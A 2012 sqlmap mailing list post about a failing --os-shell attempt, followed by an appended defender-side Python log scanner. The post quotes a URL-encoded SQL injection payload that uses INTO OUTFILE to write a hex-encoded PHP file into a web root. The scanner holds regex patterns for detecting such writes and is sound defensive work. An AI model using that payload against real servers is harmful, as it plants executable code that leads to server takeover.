Hello there,

I just get a problem when I use the --os-shell command. English is not my mother
language, but I will try my best to explain the situation.

When I use the default --os-shell payload, it does not work. The server response
is:

HTTP/1.1 200 OK
Date: Mon, 17 Dec 2012 11:42:34 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze14
Vary: Accept-Encoding
Content-Length: 1858
Content-Type: text/html

and an error message in the page:

Notice: Undefined index: id in /var/www/cat.php on line 6

The 6th line in my cat.php is:

<?php
require "header.php";
$pics = Picture::all($_GET["id"]); // ------ the sixth line

But if I shorten the payload, just like

1%20LIMIT%201%20INTO%20OUTFILE%20'/var/www/tmpuyvgq.php'%20LINES%20TERMINATED%20BY%200x3c3f7068700a696620286973737d3f3e0a%20--

this payload would work. The file is written, and the server response:

Mon, 17 Dec 2012 12:02:17 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze14
Vary: Accept-Encoding
Content-Length: 1211
Content-Type: text/html

Also with an error message:

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /var/www/classes/picture.php on line 22


I thought maybe the length of the URL is too long. Maybe there is some error in my PHP conf. But I thought the default should work in all kinds of situations. I could not figure out the problem.

Thanks everyone.

By the way, I could not receive the mailing list content. I don't know if you can receive this email.

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
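
Added example, not part of the original message and not sqlmap's own code: a defender-side check that scans web access logs for the kind of request quoted above, where an `INTO OUTFILE` clause writes a hex-encoded PHP fragment into the web root. The log format, the client addresses and the assumption that the payload arrives in the `id` parameter of `/cat.php` are constructed for illustration; the payload string itself is the one from the message.

```python
import re
from urllib.parse import unquote_plus

# Payload exactly as quoted in the message; the log lines around it are constructed.
PAYLOAD = ("1%20LIMIT%201%20INTO%20OUTFILE%20'/var/www/tmpuyvgq.php'%20LINES%20"
           "TERMINATED%20BY%200x3c3f7068700a696620286973737d3f3e0a%20--")
SAMPLE_LOG = [
    f'192.0.2.10 - - [17/Dec/2012:12:02:17 +0000] "GET /cat.php?id={PAYLOAD} HTTP/1.1" 200 1211',
    '192.0.2.11 - - [17/Dec/2012:12:03:00 +0000] "GET /cat.php?id=2 HTTP/1.1" 200 1858',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
OUTFILE = re.compile(r"INTO\s+(?:OUT|DUMP)FILE\s+'([^']+)'", re.I)
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)", re.I)
SCRIPT_EXT = (".php", ".phtml", ".php5")  # assumed set of executable extensions


def inspect_line(line):
    """Return a finding dict if the request tries a SQL file write, else None."""
    req = REQUEST.search(line)
    if not req:
        return None
    decoded = unquote_plus(req.group(1))      # undo %20 / + encoding
    out = OUTFILE.search(decoded)
    if not out:
        return None
    # Decode every 0x... literal so encoded script tags become visible.
    blobs = [bytes.fromhex(h) for h in HEX_LITERAL.findall(decoded)]
    path = out.group(1)
    return {
        "path": path,
        "web_script": path.lower().endswith(SCRIPT_EXT),
        "php_tag": any(b"<?php" in b.lower() or b"<?=" in b for b in blobs),
    }


def scan(lines):
    """Return (line_number, finding) for every suspicious log line."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := inspect_line(line))]


if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG):
        print(f"line {n}: {finding}")
```

A write like this only succeeds when the database account holds the MySQL FILE privilege and the database server can write to the target directory, so a hit is also a prompt to review both.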